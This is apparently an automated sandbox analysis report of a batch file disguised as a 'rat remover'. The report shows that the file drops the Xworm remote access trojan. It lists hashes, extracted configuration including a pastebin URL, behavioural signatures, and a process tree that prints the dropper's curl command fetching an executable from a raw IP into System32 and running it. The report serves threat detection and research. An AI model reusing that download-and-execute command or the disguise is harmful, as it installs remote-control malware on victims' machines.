Analysis

  • max time kernel
    113s
  • max time network
    119s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-11-2024 19:48

General

  • Target

    rat remover.bat

  • Size

    8KB

  • MD5

    37fa5465a015515ca2d1aec1265e50e2

  • SHA1

    c70aab71cac4f51b51e1e9b796dac8d85109442f

  • SHA256

    a5f72f5b6a80a798b398d9e0af0d06647ebd7af9d00a38213ec079b59820cad3

  • SHA512

    95ac8955274885d368d8d338bd5bd3448bfb2191118258a2c806b550ac3d314f0a7ea2496d1c526ea3341d41ac0f34bdd8431b9e2051cbdc35199a05a3be0356

  • SSDEEP

    96:ci4bPeGVlBbGV5FYAUdaIQe/0uscQGZ/nWuPloLe9maMBqeTBKAR4iWPMY+aBUAS:DoW77Shdsusc1l6aVh/y

Malware Config

Extracted

Family

xworm

Attributes
  • Install_directory

    %AppData%

  • install_file

    dllhoster.exe

  • pastebin_url

    https://pastebin.com/raw/7dw5bmk3

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 48 IoCs
  • Suspicious use of SendNotifyMessage 48 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rat remover.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:968
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3508
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:4304
      • C:\Windows\system32\curl.exe
        curl -s -o "C:\Windows\system32\dllhoster.exe" "http://185.254.97.159:4823/dllhoster.exe"
        2⤵
        • Drops file in System32 directory
        PID:640
      • C:\Windows\system32\dllhoster.exe
        "C:\Windows\system32\dllhoster.exe"
        2⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:2708
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
      1⤵
        PID:3440
      • C:\Windows\system32\taskmgr.exe
        "C:\Windows\system32\taskmgr.exe" /4
        1⤵
        • Checks SCSI registry key(s)
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:1700

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Windows\System32\dllhoster.exe

        Filesize

        76KB

        MD5

        89a4f27d32e9c88340099e2a1de430ef

        SHA1

        f4d77ea7d65c769bd571b2c0d1d141f3cfb463fb

        SHA256

        30167c2fb287e4ab79e936cf8aca48d1f776e71648da2f872e5e66f8925b0f48

        SHA512

        fe0aae62e32541122d598b6010c0c5b5537885cd28b1e6906305c546b4530de9e84fd1796b1645e633d7faae9568d060a5abae768eb0c90575aa41643ec83342

      • memory/1700-24-0x0000011B311A0000-0x0000011B311A1000-memory.dmp

        Filesize

        4KB

      • memory/1700-15-0x0000011B311A0000-0x0000011B311A1000-memory.dmp

        Filesize

        4KB

      • memory/1700-19-0x0000011B311A0000-0x0000011B311A1000-memory.dmp

        Filesize

        4KB

      • memory/1700-20-0x0000011B311A0000-0x0000011B311A1000-memory.dmp

        Filesize

        4KB

      • memory/1700-13-0x0000011B311A0000-0x0000011B311A1000-memory.dmp

        Filesize

        4KB

      • memory/1700-22-0x0000011B311A0000-0x0000011B311A1000-memory.dmp

        Filesize

        4KB

      • memory/1700-23-0x0000011B311A0000-0x0000011B311A1000-memory.dmp

        Filesize

        4KB

      • memory/1700-14-0x0000011B311A0000-0x0000011B311A1000-memory.dmp

        Filesize

        4KB

      • memory/1700-25-0x0000011B311A0000-0x0000011B311A1000-memory.dmp

        Filesize

        4KB

      • memory/1700-21-0x0000011B311A0000-0x0000011B311A1000-memory.dmp

        Filesize

        4KB

      • memory/2708-11-0x00007FFABFA60000-0x00007FFAC0521000-memory.dmp

        Filesize

        10.8MB

      • memory/2708-4-0x00007FFABFA63000-0x00007FFABFA65000-memory.dmp

        Filesize

        8KB

      • memory/2708-5-0x0000000000F30000-0x0000000000F4A000-memory.dmp

        Filesize

        104KB

      • memory/2708-12-0x0000000002FC0000-0x0000000002FCC000-memory.dmp

        Filesize

        48KB

      • memory/2708-10-0x00007FFABFA63000-0x00007FFABFA65000-memory.dmp

        Filesize

        8KB

      • memory/2708-6-0x00007FFABFA60000-0x00007FFAC0521000-memory.dmp

        Filesize

        10.8MB